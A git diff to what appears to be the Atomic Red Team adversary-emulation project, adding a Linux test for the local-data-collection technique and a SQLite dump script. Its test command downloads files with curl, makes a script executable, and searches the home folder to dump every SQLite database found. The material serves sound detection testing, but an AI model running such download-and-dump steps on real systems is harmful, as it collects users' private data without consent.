diff --git a/atomics/T1005/T1005.yaml b/atomics/T1005/T1005.yaml index 0f84e893cb..7c29fad1e4 100644 --- a/atomics/T1005/T1005.yaml +++ b/atomics/T1005/T1005.yaml @@ -1,5 +1,5 @@ attack_technique: T1005 -display_name: 'Data from Local System' +display_name: Data from Local System atomic_tests: - name: Search files of interest and save them to a single zip file (Windows) auto_generated_guid: d3d9af44-b8ad-4375-8b0a-4bff4b7e419c @@ -52,4 +52,38 @@ atomic_tests: Remove-Item -Path $outputZip\data.zip -Force name: powershell - elevation_required: false \ No newline at end of file + elevation_required: false +- name: Find and dump sqlite databases (Linux) + description: | + An adversary may know/assume that the user of a system uses sqlite databases which contain interest and sensitive data. In this test we download two databases and a sqlite dump script, then run a find command to find & dump the database content. + supported_platforms: + - linux + input_arguments: + remote_url: + description: url of remote payload + type: url + default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1005/src + dependencies: + - description: | + Check if running on a Debian based machine. + prereq_command: | + if [ -x "$(command -v sqlite3)" ]; then echo "sqlite3 is installed"; else echo "sqlite3 is NOT installed"; exit 1; fi + if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi + if [ -x "$(command -v strings)" ]; then echo "strings is installed"; else echo "strings is NOT installed"; exit 1; fi + get_prereq_command: | + if grep -iq "debian\|ubuntu\|kali\|mint" /usr/lib/os-release; then apt update && apt install -y binutils curl sqlite3; fi + if grep -iq "rhel\|fedora\|centos" /usr/lib/os-release; then yum update -y && yum install -y binutils curl sqlite-devel; fi + executor: + name: bash + elevation_required: false + command: | + cd $HOME + curl -O #{remote_url}/art + curl -O #{remote_url}/gta.db + curl -O #{remote_url}/sqlite_dump.sh + chmod +x sqlite_dump.sh + find . ! -executable -exec bash -c 'if [[ "$(head -c 15 {} | strings)" == "SQLite format 3" ]]; then echo "{}"; ./sqlite_dump.sh {}; fi' \; + cleanup_command: | + rm -f $HOME/.art + rm -f $HOME/gta.db + rm -f $HOME/sqlite_dump.sh diff --git a/atomics/T1005/src/art b/atomics/T1005/src/art new file mode 100644 index 0000000000..a4d0780c4c Binary files /dev/null and b/atomics/T1005/src/art differ diff --git a/atomics/T1005/src/gta.db b/atomics/T1005/src/gta.db new file mode 100644 index 0000000000..83136923cf Binary files /dev/null and b/atomics/T1005/src/gta.db differ diff --git a/atomics/T1005/src/sqlite_dump.sh b/atomics/T1005/src/sqlite_dump.sh new file mode 100644 index 0000000000..ef7f90d360 --- /dev/null +++ b/atomics/T1005/src/sqlite_dump.sh @@ -0,0 +1,31 @@ +#!/bin/bash + +# This script will dump each table in a sqlite 3 database + +# Check if the first command-line argument is empty +if [ -z "$1" ]; then + echo "Error: No filename provided. Exiting..." + exit 1 +fi + +# Set the name of the SQLite database file +DB_NAME=$1 + +if [ "$(head -c 15 $DB_NAME |strings)" == "SQLite format 3" ] +then + # List all tables + echo "List of tables:" + sqlite3 $DB_NAME "SELECT name FROM sqlite_master WHERE type='table';" + + # Retrieve all rows from each table + tables=$(sqlite3 $DB_NAME "SELECT name FROM sqlite_master WHERE type='table';") + echo "Retrieving data from tables:" + for table in $tables; do + echo "Table: $table" + sqlite3 $DB_NAME "SELECT * FROM $table;" + done + echo "" +else + echo "Error: The file is not a sqlite database." + exit 1 +fi